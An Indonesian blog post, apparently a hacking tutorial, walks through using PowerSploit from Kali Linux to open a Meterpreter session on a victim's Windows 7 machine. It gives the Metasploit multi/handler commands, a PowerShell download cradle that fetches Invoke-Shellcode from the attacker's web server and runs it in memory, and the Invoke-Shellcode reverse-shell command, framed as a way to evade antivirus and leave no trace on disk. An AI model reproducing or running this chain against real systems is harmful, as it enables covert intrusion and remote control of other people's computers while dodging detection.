Tuesday, June 28, 2016

Tutorial menggunakan Powersploit Kali Linux

Tutorial menggunakan Powersploit Kali Linux_1
Tutorial menggunakan Powersploit Kali Linux

Putri's Blog, - Microsoft secara implisit mengakui keunggulan terminal Linux atas sistem operasi berbasis GUI dengan mengembangkan PowerShell. Sejak Windows 7 terlahir, setiap sistem operasi Windows telah memiliki PowerShell terinstal secara default, dan mereka bahkan membuat PowerShell mampu berjalan perintah Linux di Windows!
PowerShell bersifat sama dengan terminal yang ada dilinux beda dengan command prompt bawaan windows sperti biasanya powershell ini memiliki sifat yang kuat untuk mendapatkan akses apa saja dilakukan di Windows, termasuk scripting. Sayangnya hal ini kebanyakkan diketahui oleh beberapa administrator yang menggunakannya dan beberapa pengguna bahkan tidak tahu powershell itu ada.

Sebagai hacker, PowerShell dapat menjadi sekutu tangguh dalam upaya kita untuk mengendalikan sistem. Jika kita dapat mengakses sistem PowerShell, kita dapat menggunakan kekuatannya untuk mengontrol, dan mempertahankan kontrol sistem target. Selain itu, jika kita dapat menjalankan perintah dan script kita dalam konteks PowerShell, kita dapat menghindari kebanyakan software antivirus (AV) atau bersifat seperti programming yang membuat virus sehingga kita tidak mudah untuk terdeteksi olehnya..

Untungnya bagi kita, serangkaian script PowerShell telah dikembangkan oleh Matt Graeber yang dapat membantu kita mengontrol dan memanipulasi sistem target. Ini script khusus dibuat dikenal secara kolektif sebagai PowerSploit. Untungnya, mereka dibangun ke Kali. Jika Anda tidak menggunakan Kali. 

Namun anda juga bisa menggunakan Powersploit di os lain yang dapat anda download : DISINI


Langkah 1: Mulai PowerSploit
Untuk memulai, mari kita jalankan Kali. Untuk memulai PowerSploit, cukup pergi ke menu Kali Linux -> Post Exploitation -> powersploit. Atau, cukup arahkan ke /usr/share/powersploit dari terminal.

Gambaran memulai mencari tool powersploit di Kali linux_IBTeam Aceh
Gambaran memulai mencari tool powersploit di Kali linux


Ini gambaran Powersploit bila dibuka dari terminal di /usr/shar/powersploit.

Gambaran ketika memasuki direktori powersploit_IBT_Aceh
Gambaran ketika memasuki direktori powersploit

Seperti yang Anda lihat, didalamnya memiliki delapan direktori PowerSploit.
  1. AntivirusBypass
  2. CodeExecution
  3. Exfiltration
  4. Persistence
  5. PETools
  6. Recon
  7. ReverseEngineering
  8. ScriptModification

Dalam tutorial ini, kita akan menggunakan script dari CodeExecution direktori disebut Invoke-shellcode.

cd CodeExecution

Gambaran perintah ls -l didalam direktori CodeExection Powersploit yang berhasil ditampilkan_putrighaly.blogspot.com
Gambaran perintah ls -l didalam direktori CodeExection Powersploit yang berhasil ditampilkan



Langkah 2: Memulai Web Server
Untuk langkah berikutnya, kita harus mulai web server pada sistem Kali, untuk melayani sampai perintah PowerSploit kami, ke mesin korban. Ada banyak cara untuk melakukan hal ini; Anda bisa melakukkannya juga, misalnya, salin direktori PowerSploit ke /var/ www/html dan mulai web server Apache.

Untuk menerapkan metode lainya sebuah solusi sederhana dan lebih elegan dapat dimulai dengan memanfaatkan web Python server sederhana di direktori PowerSploit. Kita dapat melakukan ini dengan mengetik sementara dalam direktori PowerSploit.


Gambaran memulai aktifkan fitur web server lokal dengan perintah python di direktori powersploit_Tutorial Menggunakan Powersploit Kali
Gambaran memulai aktifkan fitur web server lokal dengan perintah python di direktori powersploit

Sekarang, kita memiliki web server dimulai di direktori PowerSploit. Ini berarti bahwa siapa saja yang mengakses web server akan memiliki akses ke direktori pada sistem Kali linux kita.


Langkah 3: Mulai PowerSploit pada Korban
Untuk melakukan hack, kita mengasumsikan bahwa Anda sudah memiliki akses ke mesin target dan mencoba untuk mendapatkan shell meterpreter tanpa memicu software AV. Untuk tujuan kita di sini, kita mengasumsikan Anda memiliki GUI pada sistem target dengan RDP atau VNC.

Mulai menggunakan PowerShell pada sistem korban dengan pergi ke menu Start Windows dan mengetik PowerShell di jendela pencariannya.

Gambaran menjalankan Windows Powershell di windows 7_putrighaly.blogspot.com
Gambaran menjalankan Windows Powershell di windows 7
Klik pada ikon PowerShell dan mulai PowerShell pada mesin korban.


Langkah 4: Buka Browser dan Arahkan ke Web Server Anda di Kali
Dari sistem target Windows 7, sekarang kita dapat menavigasi ke web server di Kali.

Gambaran pemanggilan Direktori melalui web server dengan menggunakan alamat ip kali linux penyerang_putrighaly.blogspot.com
Gambaran pemanggilan Direktori melalui web server dengan menggunakan alamat ip kali linux penyerang

Seperti yang kita lihat, semua skrip PowerSploit tersedia di server web kami untuk men-download ke korban.

Langkah 5: Mulai Multi / Handler di Kali
Kita akan membutuhkan multi / handler pada sistem Kali menerima komunikasi dengan meterpreter dari sistem target. Mulai Metasploit konsol dengan mengetik:

msfconsole

Untuk memulai multi / handler, kita perlu perintah berikut:
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_http
msf > set LHOST <ip target>
msf > set LPORT 4444
msf > exploit

Gambaran tentang menghandle koneksi korban melalui metasploit_putrighaly.blogspot.com
Gambaran tentang menghandle koneksi korban melalui metasploit
Seperti yang Anda lihat dalam gambar di atas, kita sekarang memiliki handler menunggu koneksi dari sistem korban.


Langkah 6: Download PowerSploit Script
Pada sistem Windows 7, kita selanjutnya akan menggunakan PowerShell untuk men-download script PowerSploit dari sistem Kali linux melalui web Python server sederhana yang telah diaktifkan tadi. Kita dapat melakukannya dengan mengetik perinta ini di powershell:
IEX(New-Object Net.WebClient).DownloadString ("http://192.168.181.128:8000/CodeExecution/Invoke-Shellcode.ps1")

Gambaran tentang cara mendownload script dari powershell windows 7_putrighaly.blogspot.com
Gambaran tentang cara mendownload script dari powershell windows 7


Pada sistem Kali kita, kita dapat melihat bahwa sistem Windows 7 web server telah terpukul dengan permintaan GET dari sistem Windows 7. Hal ini secara efektif download skrip Invoke-shellcode kita ke mesin Windows 7.
Gambaran bukti bahwa web server penyerang sedang di akses oleh si target_putrighaly.blogspot.com
Gambaran bukti bahwa web server penyerang sedang di akses oleh si target









Kembali pada sistem Windows 7, kita sekarang ingin menjalankan script PowerSploit. Jika kita telah melakukan semuanya dengan benar, maka script ini akan memulai sesi meterpreter pada mesin Windows 7 dalam konteks proses PowerShell.

Invoke-Shellcode -Payload windows/meterpreter/reverse_http -lhost 192.168.181.128 -lport 4444 -Force

Gambaran Menjalankan payload dari  powershell_putrighaly.blogspot.com
Gambaran Menjalankan payload dari  powershell



Langkah 7: Mencari meterpreter Sesi di Kali
Sekarang, mari kita kembali ke luar sistem Kali dan melihat untuk melihat apakah sesi meterpreter telah dibuka. Mari kita kembali ke msfconsole di mana kita memiliki multi / handler menunggu koneksi dan jenis.

sessions -l

Ini bukti daftar sesi  semua dibuka.

Gambaran bukti, bahwa sesi target telah terbuka semua_putrighaly.blogspot.com
Gambaran bukti, bahwa sesi target telah terbuka semua


Selamat! Kita berhasil mendapat sesi meterpreter pada PC korban. Kunggulan sesi ini bahwa meterpreter shell berjalan dalam konteks proses PowerShell dan tidak akan nyangkut oleh software AV. Selain itu, meterpreter berjalan sepenuhnya di memori sehingga tidak akan meninggalkan bukti pada hard drive. Amazing bukan sobat. Semoga artikel Tutorial menggunakan Powersploit Kali Linux dapat bermanfaat bagi anda semuanya. Ghaly

0 komentar